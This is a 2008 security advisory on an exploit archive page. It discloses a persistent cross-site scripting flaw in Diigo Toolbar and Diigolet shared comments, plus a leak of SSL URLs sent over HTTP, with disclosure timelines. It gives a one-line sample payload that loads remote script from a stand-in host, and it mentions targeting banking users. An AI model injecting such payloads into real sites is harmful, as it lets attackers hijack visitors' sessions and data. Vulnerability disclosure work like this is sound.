what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

diigo-xss.txt

diigo-xss.txt
Posted Jun 20, 2008
Authored by Ferruh Mavituna | Site ferruh.mavituna.com

Diigo Toolbar suffers from a global cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 21a323d1581282c52404d2bfe4aed45ed5fa7390089119deb2828f1987f77587

diigo-xss.txt

Change Mirror Download
Diigo Toolbar - Global XSS and Information Leakage in SSL URLs

== Global XSS ==
Diigo is (http://www.diigo.com/) a social bookmarking and sharing
application which allows users to see other users comments and notes
for every website. For this feature users should use Diigolet
bookmarklet or Diigo Toolbar - http://www.diigo.com/tools. These are
almost mandatory to use Diigo and almost all Diigo members have them
installed.

An attacker can do Cross-site Scripting in these public comments and
that comment will affect any other user of Diigo Toolbar and Diigolet
who visits the website. This means a Diigo user can backdoor any
website in the internet easily with a permanent XSS and any other
Diigo user who visits this website will be affected. Vulnerability
exists in:
* Diigo Toolbar for IE,
* Diigo Toolbar for FF,
* Diigolet for IE and FF,

These comments will be injected into the current domain context, thus
an attacker can execute a Javascript code in the target domain,
Target URL can be over SSL as well. All Diigo tools users are affected
from this vulnerability.

For an attacker this is a perfect opportunity to use some XSS bot
manager application such as XSS Shell, Also an attacker can attack
high profile websites such as online banking applications. Considering
you can search in shared bookmarks so you can actually people who uses
a certain online banking application.

Sample attack comment can be:
<script src="http://example.com/xssshell/"></script>


== Fix ==
Download latest version of Diigo Toolbar

== Disclosure Timeline ==
* 12 May 2008 - Vendor Informed
* 2 June 2008 - Another e-mail to vendor to check if they've fixed
* 3 June 2008 - Vendor informed me that it's fixed
* 20 June 2008 - Public Release


== Information Leakage in SSL URLs ==
Diigo toolbar is sending all SSL URLs to their servers over HTTP for
shared comment feature, which might cause to leak session_ids over URL
or any other sensitive information transferred over URL.


== Fix ==
User can not opt-out from this feature. There is no known fix, this
looks like considered as a feature not a bug.

== Disclosure Timeline ==
* 9 May 2008 - Vendor Informed, Couple of mail exchanged and I tried
to explain why this is bad, it didn't work.
* 12 May 2008 - Ask for an update, No response.
* 20 June 2008 - Public Release


--
Ferruh Mavituna
http://ferruh.mavituna.com

Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    14 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close